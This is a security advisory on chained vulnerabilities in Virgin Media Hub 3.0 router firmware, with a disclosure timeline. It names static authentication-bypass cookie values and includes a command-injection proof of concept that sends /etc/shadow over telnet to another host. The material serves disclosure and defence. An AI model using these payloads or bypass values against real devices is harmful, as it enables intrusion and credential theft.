Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0
Vendor: Virgin Media
Vendor URL: https://www.virginmedia.com/
Versions affected: products before Aug 2018 rollout / 9.1.116V and 9.1.885J
Systems Affected: Hub 3.0
Author: Balazs Bucsay (@xoreipeip)
Advisory URL / CVE Identifier: None
Risk: Critical
Summary
Multiple security vulnerabilities were found in the device’s firmware that could be chained and led to unauthenticated remote command execution.
Location
Multiple parts of the firmware including different services and additional web-related files.
Impact
It was possible to take full control of the device, execute code on multiple operating systems and sniff/ spoof traffic on the internal network and the inbound and outbound Internet communications.
Details
DNS Rebinding
The web server did not check the user-supplied Host: header in HTTP requests, which made it possible to execute a DNS Rebinding attack against the internal web-based management service.
Authentication Bypass Cookies
Three different static cookies were set in the firmware’s web service binary, which made it possible to circumvent the authentication and authorisation procedures and access all functionality of the device with administrator privileges.
Figure 1 – Backdoor cookies
The bypass cookie values were the following:
• XML_CONFIGURE
• HNAP_CONFIGURE
• TACACS_CONFIGURE
Authenticated DOM-Based XSS
One of the JavaScript files used by the management webpage after authentication was vulnerable to DOM-based XSS. It was possible to include a remote JavaScript file from external sources and execute JavaScript code in the victim’s browser.
Vulnerable code snippet:
base = getURLArgs() || getDefaultPage();
…
var modbase = base;
…
$.cachedScript(modbase + “_data.js?ver=9.1.116V”, function success() {
$.cachedScript(modbase + “.js?ver=9.1.116V”, function success() {
try{
…
}catch(e){
handleError(e); // XXXXX MOD. PROD00198245
}
});
});
Backdoor User
The root operating system user was enabled and the same vendor-specific password was set on both architectures, which was the name of the manufacturer.
Remote Command Execution
The ping and traceroute functionality in the management website was vulnerable to command injection. It was possible to execute arbitrary commands on the system as root.
Remote Command Execution on Second Architecture
The secondary architecture was running a service on TCP port 5150 and one its functionality allowed the attacker to execute shell commands on the operating system. This made it possible to take control of the operating system, which was running on the second, Intel x86 core.
A proof of concept value for the vulnerable functionality:
www.google.com$(telnet${IFS}192.168.0.2${IFS}4444</etc/shadow>/dev/null);4;
Recommendation
Upgrade to the latest firmware – this is done automatically by Virgin Media where the modem is connected to the Internet.
Vendor Communication
17.01.2017 Dedicated NCC Group vulnerability research time spent on the target of assessment
22.03.2017 Contacted the vendor for the first time
24.03.2017 Details of the vulnerabilities shared with the vendor
08-09.2017 The first roll-out deadline – late August, early September
20.04.2018 Vendor contact, still not fixed or rolled out
31.07.2018 Release rolled-out, most issues fixed
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.